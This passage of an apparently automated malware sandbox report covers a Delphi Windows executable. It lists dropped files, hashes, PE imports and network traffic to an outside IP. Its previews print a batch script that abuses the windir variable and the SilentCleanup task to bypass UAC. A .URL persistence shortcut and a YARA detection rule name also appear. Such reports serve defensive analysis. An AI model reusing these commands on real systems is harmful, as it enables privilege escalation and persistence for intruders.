                  SHA-512:7A13B4E4EF67F2598F13B8B5FBEAF075324BC07F44105743FC42839086F79F57BA46DC2B8441DCA7C0CE80D75ABD08BA618B6669217A94FA29419F2178F64119
                  Malicious:false
                  Yara Hits:
                  • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\fvghbqsD.url, Author: @itsreallynick (Nick Carr)
                  Preview: [InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Dsqbhgvf.exe"..IconIndex=1..
                  C:\Users\Public\Trast.bat
                  Process:C:\Users\user\Desktop\IQl00lxPjo.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):34
                  Entropy (8bit):4.314972767530033
                  Encrypted:false
                  SSDEEP:3:LjTnaHF5wlM:rnaHSM
                  MD5:4068C9F69FCD8A171C67F81D4A952A54
                  SHA1:4D2536A8C28CDCC17465E20D6693FB9E8E713B36
                  SHA-256:24222300C78180B50ED1F8361BA63CB27316EC994C1C9079708A51B4A1A9D810
                  SHA-512:A64F9319ACC51FFFD0491C74DCD9C9084C2783B82F95727E4BFE387A8528C6DCF68F11418E88F1E133D115DAF907549C86DD7AD866B2A7938ADD5225FBB2811D
                  Malicious:false
                  Preview: start /min C:\Users\Public\UKO.bat
                  C:\Users\Public\UKO.bat
                  Process:C:\Users\user\Desktop\IQl00lxPjo.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):250
                  Entropy (8bit):4.865356627324657
                  Encrypted:false
                  SSDEEP:6:rgnMXd1CQnMXd1COm8hnaHNHIXUnMXd1CoD9c1uOw1H1gOvOBAn:rgamIHIXUaXe1uOeVqy
                  MD5:EAF8D967454C3BBDDBF2E05A421411F8
                  SHA1:6170880409B24DE75C2DC3D56A506FBFF7F6622C
                  SHA-256:F35F2658455A2E40F151549A7D6465A836C33FA9109E67623916F889849EAC56
                  SHA-512:FE5BE5C673E99F70C93019D01ABB0A29DD2ECF25B2D895190FF551F020C28E7D8F99F65007F440F0F76C5BCAC343B2A179A94D190C938EA3B9E1197890A412E9
                  Malicious:false
                  Preview: reg delete hkcu\Environment /v windir /f..reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "..schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I & exit..
                  C:\Users\Public\nest
                  Process:C:\Users\user\Desktop\IQl00lxPjo.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):10
                  Entropy (8bit):3.321928094887362
                  Encrypted:false
                  SSDEEP:3:xHQ6:Bp
                  MD5:373B184E2170B4EC46625ACD5BBF9F8B
                  SHA1:FF4139853B895C0BC626BEBF705FCBAED493A28B
                  SHA-256:A753F2006FE838116E8969E075E53EF64387CDC71D1215758E9E3D47D44C3B98
                  SHA-512:0A6C27112762CB22239B25C4179517137999EC178801FBF0A3EFDEE91291C3C931B8805FF77E2497028AA77FDA6A28CDCD13A94B73E7FE663CA056CFF7BB1C23
                  Malicious:false
                  Preview: Dsqbhgvf..
                  C:\Users\Public\nest.bat
                  Process:C:\Users\user\Desktop\IQl00lxPjo.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):53
                  Entropy (8bit):4.263285494083192
                  Encrypted:false
                  SSDEEP:3:LjT9fnMXdemzCK0vn:rZnMXd1CV
                  MD5:8ADA51400B7915DE2124BAAF75E3414C
                  SHA1:1A7B9DB12184AB7FD7FCE1C383F9670A00ADB081
                  SHA-256:45AA3957C29865260A78F03EEF18AE9AEBDBF7BEA751ECC88BE4A799F2BB46C7
                  SHA-512:9AFC138157A4565294CA49942579CDB6F5D8084E56F9354738DE62B585F4C0FA3E7F2CBC9541827F2084E3FF36C46EED29B46F5DD2444062FFCD05C599992E68
                  Malicious:false
                  Preview: start /min reg delete hkcu\Environment /v windir /f..
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\Dsqbhgvfcbfuajfyoyryjvltgfkcgym[1]
                  Process:C:\Users\user\Desktop\IQl00lxPjo.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):582144
                  Entropy (8bit):7.999235995821566
                  Encrypted:true
                  SSDEEP:12288:7goBElyCyWBKaxDKfQ8K9bMZCJfTFpUlYFEDVbrpjmgJrv6aJV2:UEExGK94ZMfRpEYup38gJryaJc
                  MD5:E9116C413E8F55849FC05ABED62DB4D6
                  SHA1:5CB1468C95350FF8B74D5B8ABB8ABCB5F1CEA074
                  SHA-256:ACD077CED83E35E49512C807F3AF36FF1B39EF7D62A19CAFD975313A0D1F6D41
                  SHA-512:477B1BDD7F35ABA99894B59F8C5525A38677DF10011BDBCE1736B9E4FDDB12D3306B5149E1AF7119E9FA485E78B921F5E0955BBC9C0049DA556B9BB52BA85ECF
                  Malicious:false
                  Preview: .#i.XPL.+i.a.t.....".y......5....I7........K9.F.p....r..3.....|5.!m....k.e.9.C-n....J.........x.Y._..(.9.ZY...!jv..u.".?*.<.c.~'x...i.a.t.....".y......5....I7........K9.F.p....r..3.....|5.!m....k.e.9.C-n....J.........x.Y._..(.9.ZY..."......=../.....=..<.....t..._.....=[..a..3.hn..Q.3...........^hs............y..J..q.T\h|:...B.7S...N..w.....Y.S...@.{..2.NB.......0.I)frc.8...C$.."....,.?%`c..1B..*.Q..g...=.....-a.D.~i.nP.{...'..#z>..5....]...............k.W.O.ZJ..ZXW.|&..H..o.RI>.z(.Y.;_.....TU.0...9..`k..m.I?;...b....|f2.A^..`l..^he._.g......<..7.......=_....2...........6.bhe.......c.]...?7....r....J..6.bhe..........".Q.+fs..q.H..'}.._.z ...c....m.KK<...9..`k..m.I?;...b.....\%....1..v...]....W..G2.M..k.o............W.C ..>.}....p\%...o.g.<..TQ............m.h>._.tbjr.]...;..ZB..U.@.p.>.H...?`.k.l.=..Y.S...@.{..2.NB.......Ah......(...Y.S...@.{..2.NB.....}.F...I)g.$..5...0.~F..U..}.C..{..=.....".0......[......0.m.....(....G-i.!K-l..!v
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\Dsqbhgvfcbfuajfyoyryjvltgfkcgym[2]
                  Process:C:\Users\Public\Libraries\Dsqbhgvf.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):582144
                  Entropy (8bit):7.999235995821566
                  Encrypted:true
                  SSDEEP:12288:7goBElyCyWBKaxDKfQ8K9bMZCJfTFpUlYFEDVbrpjmgJrv6aJV2:UEExGK94ZMfRpEYup38gJryaJc
                  MD5:E9116C413E8F55849FC05ABED62DB4D6
                  SHA1:5CB1468C95350FF8B74D5B8ABB8ABCB5F1CEA074
                  SHA-256:ACD077CED83E35E49512C807F3AF36FF1B39EF7D62A19CAFD975313A0D1F6D41
                  SHA-512:477B1BDD7F35ABA99894B59F8C5525A38677DF10011BDBCE1736B9E4FDDB12D3306B5149E1AF7119E9FA485E78B921F5E0955BBC9C0049DA556B9BB52BA85ECF
                  Malicious:false
                  Preview: .#i.XPL.+i.a.t.....".y......5....I7........K9.F.p....r..3.....|5.!m....k.e.9.C-n....J.........x.Y._..(.9.ZY...!jv..u.".?*.<.c.~'x...i.a.t.....".y......5....I7........K9.F.p....r..3.....|5.!m....k.e.9.C-n....J.........x.Y._..(.9.ZY..."......=../.....=..<.....t..._.....=[..a..3.hn..Q.3...........^hs............y..J..q.T\h|:...B.7S...N..w.....Y.S...@.{..2.NB.......0.I)frc.8...C$.."....,.?%`c..1B..*.Q..g...=.....-a.D.~i.nP.{...'..#z>..5....]...............k.W.O.ZJ..ZXW.|&..H..o.RI>.z(.Y.;_.....TU.0...9..`k..m.I?;...b....|f2.A^..`l..^he._.g......<..7.......=_....2...........6.bhe.......c.]...?7....r....J..6.bhe..........".Q.+fs..q.H..'}.._.z ...c....m.KK<...9..`k..m.I?;...b.....\%....1..v...]....W..G2.M..k.o............W.C ..>.}....p\%...o.g.<..TQ............m.h>._.tbjr.]...;..ZB..U.@.p.>.H...?`.k.l.=..Y.S...@.{..2.NB.......Ah......(...Y.S...@.{..2.NB.....}.F...I)g.$..5...0.~F..U..}.C..{..=.....".0......[......0.m.....(....G-i.!K-l..!v
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\Dsqbhgvfcbfuajfyoyryjvltgfkcgym[1]
                  Process:C:\Users\Public\Libraries\Dsqbhgvf.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):582144
                  Entropy (8bit):7.999235995821566
                  Encrypted:true
                  SSDEEP:12288:7goBElyCyWBKaxDKfQ8K9bMZCJfTFpUlYFEDVbrpjmgJrv6aJV2:UEExGK94ZMfRpEYup38gJryaJc
                  MD5:E9116C413E8F55849FC05ABED62DB4D6
                  SHA1:5CB1468C95350FF8B74D5B8ABB8ABCB5F1CEA074
                  SHA-256:ACD077CED83E35E49512C807F3AF36FF1B39EF7D62A19CAFD975313A0D1F6D41
                  SHA-512:477B1BDD7F35ABA99894B59F8C5525A38677DF10011BDBCE1736B9E4FDDB12D3306B5149E1AF7119E9FA485E78B921F5E0955BBC9C0049DA556B9BB52BA85ECF
                  Malicious:false
                  Preview: .#i.XPL.+i.a.t.....".y......5....I7........K9.F.p....r..3.....|5.!m....k.e.9.C-n....J.........x.Y._..(.9.ZY...!jv..u.".?*.<.c.~'x...i.a.t.....".y......5....I7........K9.F.p....r..3.....|5.!m....k.e.9.C-n....J.........x.Y._..(.9.ZY..."......=../.....=..<.....t..._.....=[..a..3.hn..Q.3...........^hs............y..J..q.T\h|:...B.7S...N..w.....Y.S...@.{..2.NB.......0.I)frc.8...C$.."....,.?%`c..1B..*.Q..g...=.....-a.D.~i.nP.{...'..#z>..5....]...............k.W.O.ZJ..ZXW.|&..H..o.RI>.z(.Y.;_.....TU.0...9..`k..m.I?;...b....|f2.A^..`l..^he._.g......<..7.......=_....2...........6.bhe.......c.]...?7....r....J..6.bhe..........".Q.+fs..q.H..'}.._.z ...c....m.KK<...9..`k..m.I?;...b.....\%....1..v...]....W..G2.M..k.o............W.C ..>.}....p\%...o.g.<..TQ............m.h>._.tbjr.]...;..ZB..U.@.p.>.H...?`.k.l.=..Y.S...@.{..2.NB.......Ah......(...Y.S...@.{..2.NB.....}.F...I)g.$..5...0.~F..U..}.C..{..=.....".0......[......0.m.....(....G-i.!K-l..!v

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):6.67407039380249
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 90.53%
                  • Win32 Executable Borland Delphi 7 (665061/41) 6.02%
                  • Win32 Executable Borland Delphi 6 (262906/60) 2.38%
                  • InstallShield setup (43055/19) 0.39%
                  • Win32 EXE PECompact compressed (generic) (41571/9) 0.38%
                  File name:IQl00lxPjo.exe
                  File size:811520
                  MD5:9b8ae8edfe553edea6108dceebcc57b8
                  SHA1:eae4825368e0ed56db5484012303add569cb98e9
                  SHA256:d79ba47a55b5dcb4cf6e76ac13bd3179e1523d5904483232d9ce9d39915dbc69
                  SHA512:5f357814e91904f33b878691f143b34139fd445e1651dae8a9825ca4b43710ddf8d2ec32d9f9893d6e93b93259b2ac19d0587fe4aa1b5a4987c064e793b12658
                  SSDEEP:24576:W0WE0AyOVWoKcwdZHGIZHrIzvlZwXI7Dyj3SaH+MJu:W0WEoQhudZS
                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                  File Icon

                  Icon Hash:88c7ce18995c2711

                  Static PE Info

                  General

                  Entrypoint:0x461128
                  Entrypoint Section:CODE
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                  DLL Characteristics:
                  Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC] (the constant link-time stamp Borland Delphi writes into every binary, consistent with the Delphi origin TrID reports; it is not a real build date)
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:91f41270d021c09d2e59583bf5cdff98

                  Entrypoint Preview

                  Instruction
                  push ebp
                  mov ebp, esp
                  add esp, FFFFFFF0h
                  mov eax, 00460EE0h
                  call 00007FCD18D8F011h
                  nop
                  nop
                  mov eax, dword ptr [0046320Ch]
                  mov eax, dword ptr [eax]
                  call 00007FCD18DDF7ABh
                  mov eax, dword ptr [0046320Ch]
                  mov eax, dword ptr [eax]
                  mov edx, 00461188h
                  call 00007FCD18DDF39Ah
                  mov ecx, dword ptr [00463078h]
                  mov eax, dword ptr [0046320Ch]
                  mov eax, dword ptr [eax]
                  mov edx, dword ptr [00460BB0h]
                  call 00007FCD18DDF79Ah
                  mov eax, dword ptr [0046320Ch]
                  mov eax, dword ptr [eax]
                  call 00007FCD18DDF80Eh
                  call 00007FCD18D8CC59h

                  Data Directories

                  Name | Virtual Address | Virtual Size | Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x65000 | 0x242c | .idata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x71000 | 0x5b000 | .rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6a000 | 0x6e38 | .reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_TLS | 0x69000 | 0x18 | .rdata
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                  Sections

                  Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                  CODE | 0x1000 | 0x60194 | 0x60200 | False | 0.529060671326 | data | 6.54290366694 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  DATA | 0x62000 | 0x139c | 0x1400 | False | 0.4396484375 | data | 4.14683566997 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  BSS | 0x64000 | 0xed5 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  .idata | 0x65000 | 0x242c | 0x2600 | False | 0.350945723684 | data | 4.76283306715 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  .tls | 0x68000 | 0x10 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  .rdata | 0x69000 | 0x18 | 0x200 | False | 0.048828125 | data | 0.20058190744 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                  .reloc | 0x6a000 | 0x6e38 | 0x7000 | False | 0.610456194196 | data | 6.65210314529 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                  .rsrc | 0x71000 | 0x5b000 | 0x5b000 | False | 0.276992294815 | data | 5.76295915505 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                  Resources

                  Name | RVA | Size | Type | Language | Country
                  DONGA | 0x71bf0 | 0x4cae4 | PC bitmap, Windows 3.x format, 319 x 158 x 4 | English | United States
                  RT_CURSOR | 0xbe6d4 | 0x134 | data | |
                  RT_CURSOR | 0xbe808 | 0x134 | data | |
                  RT_CURSOR | 0xbe93c | 0x134 | data | |
                  RT_CURSOR | 0xbea70 | 0x134 | data | |
                  RT_CURSOR | 0xbeba4 | 0x134 | data | |
                  RT_CURSOR | 0xbecd8 | 0x134 | data | |
                  RT_CURSOR | 0xbee0c | 0x134 | data | |
                  RT_BITMAP | 0xbef40 | 0x1d0 | data | |
                  RT_BITMAP | 0xbf110 | 0x1e4 | data | |
                  RT_BITMAP | 0xbf2f4 | 0x1d0 | data | |
                  RT_BITMAP | 0xbf4c4 | 0x1d0 | data | |
                  RT_BITMAP | 0xbf694 | 0x1d0 | data | |
                  RT_BITMAP | 0xbf864 | 0x1d0 | data | |
                  RT_BITMAP | 0xbfa34 | 0x1d0 | data | |
                  RT_BITMAP | 0xbfc04 | 0x1d0 | data | |
                  RT_BITMAP | 0xbfdd4 | 0x1d0 | data | |
                  RT_BITMAP | 0xbffa4 | 0x1d0 | data | |
                  RT_BITMAP | 0xc0174 | 0xe8 | GLS_BINARY_LSB_FIRST | English | United States
                  RT_ICON | 0xc025c | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                  RT_ICON | 0xc06c4 | 0x988 | data | English | United States
                  RT_ICON | 0xc104c | 0x10a8 | data | English | United States
                  RT_ICON | 0xc20f4 | 0x25a8 | data | English | United States
                  RT_ICON | 0xc469c | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 0, next used block 0 | English | United States
                  RT_DIALOG | 0xc88c4 | 0x52 | data | |
                  RT_STRING | 0xc8918 | 0x2ec | data | |
                  RT_STRING | 0xc8c04 | 0x1f0 | data | |
                  RT_STRING | 0xc8df4 | 0x1c0 | data | |
                  RT_STRING | 0xc8fb4 | 0xdc | data | |
                  RT_STRING | 0xc9090 | 0x354 | data | |
                  RT_STRING | 0xc93e4 | 0xd4 | data | |
                  RT_STRING | 0xc94b8 | 0x110 | data | |
                  RT_STRING | 0xc95c8 | 0x24c | data | |
                  RT_STRING | 0xc9814 | 0x3f0 | data | |
                  RT_STRING | 0xc9c04 | 0x378 | data | |
                  RT_STRING | 0xc9f7c | 0x3e8 | data | |
                  RT_STRING | 0xca364 | 0x234 | data | |
                  RT_STRING | 0xca598 | 0xec | data | |
                  RT_STRING | 0xca684 | 0x1b4 | data | |
                  RT_STRING | 0xca838 | 0x3e4 | data | |
                  RT_STRING | 0xcac1c | 0x358 | data | |
                  RT_STRING | 0xcaf74 | 0x2b4 | data | |
                  RT_RCDATA | 0xcb228 | 0x10 | data | |
                  RT_RCDATA | 0xcb238 | 0x2f8 | data | |
                  RT_RCDATA | 0xcb530 | 0x7fb | Delphi compiled form 'T__613549893' | |
                  RT_GROUP_CURSOR | 0xcbd2c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
                  RT_GROUP_CURSOR | 0xcbd40 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
                  RT_GROUP_CURSOR | 0xcbd54 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
                  RT_GROUP_CURSOR | 0xcbd68 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
                  RT_GROUP_CURSOR | 0xcbd7c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
                  RT_GROUP_CURSOR | 0xcbd90 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
                  RT_GROUP_CURSOR | 0xcbda4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
                  RT_GROUP_ICON | 0xcbdb8 | 0x4c | data | English | United States

                  Imports

                  DLL | Import
                  kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                  user32.dll | GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                  advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
                  oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
                  kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                  advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
                  kernel32.dll | lstrcpyA, lstrcmpiA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetUserDefaultLCID, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                  version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                  gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetMapMode, GetGraphicsMode, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionA, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetDCPenColor, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBkColor, GetBitmapBits, ExtTextOutA, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateEnhMetaFileA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CloseEnhMetaFile, BitBlt
                  user32.dll | CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                  kernel32.dll | Sleep
                  oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                  ole32.dll | CreateStreamOnHGlobal, IsAccelerator, OleDraw, OleSetMenuDescriptor, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID
                  oleaut32.dll | GetErrorInfo, SysFreeString
                  comctl32.dll | ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                  comdlg32.dll | GetOpenFileNameA

                  Possible Origin

                  Language of compilation system | Country where language is spoken
                  English | United States

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Sep 16, 2021 07:31:43.595730066 CEST | 49768 | 8618 | 192.168.2.4 | 31.3.152.100
                  Sep 16, 2021 07:31:43.736527920 CEST | 8618 | 49768 | 31.3.152.100 | 192.168.2.4
                  Sep 16, 2021 07:31:43.739193916 CEST | 49768 | 8618 | 192.168.2.4 | 31.3.152.100
                  Sep 16, 2021 07:31:43.768744946 CEST | 49768 | 8618 | 192.168.2.4 | 31.3.152.100
                  Sep 16, 2021 07:31:43.919629097 CEST | 8618 | 49768 | 31.3.152.100 | 192.168.2.4
                  Sep 16, 2021 07:31:43.961529970 CEST | 49768 | 8618 | 192.168.2.4 | 31.3.152.100
                  Sep 16, 2021 07:31:44.102533102 CEST | 8618 | 49768 | 31.3.152.100 | 192.168.2.4
                  Sep 16, 2021 07:31:44.110025883 CEST | 49768 | 8618 | 192.168.2.4 | 31.3.152.100
                  Sep 16, 2021 07:31:44.295824051 CEST | 8618 | 49768 | 31.3.152.100 | 192.168.2.4
                  Sep 16, 2021 07:31:44.297333956 CEST | 49768 | 8618 | 192.168.2.4 | 31.3.152.100
                  Sep 16, 2021 07:31:44.481712103 CEST | 8618 | 49768 | 31.3.152.100 | 192.168.2.4
                  Sep 16, 2021 07:31:44.630225897 CEST | 8618 | 49768 | 31.3.152.100 | 192.168.2.4
                  Sep 16, 2021 07:31:44.637145042 CEST | 49768 | 8618 | 192.168.2.4 | 31.3.152.100
                  Sep 16, 2021 07:31:44.830382109 CEST | 8618 | 49768 | 31.3.152.100 | 192.168.2.4
                  Sep 16, 2021 07:31:54.642986059 CEST | 8618 | 49768 | 31.3.152.100 | 192.168.2.4
                  Sep 16, 2021 07:31:54.678993940 CEST | 49768 | 8618 | 192.168.2.4 | 31.3.152.100
                  Sep 16, 2021 07:31:54.863089085 CEST | 8618 | 49768 | 31.3.152.100 | 192.168.2.4
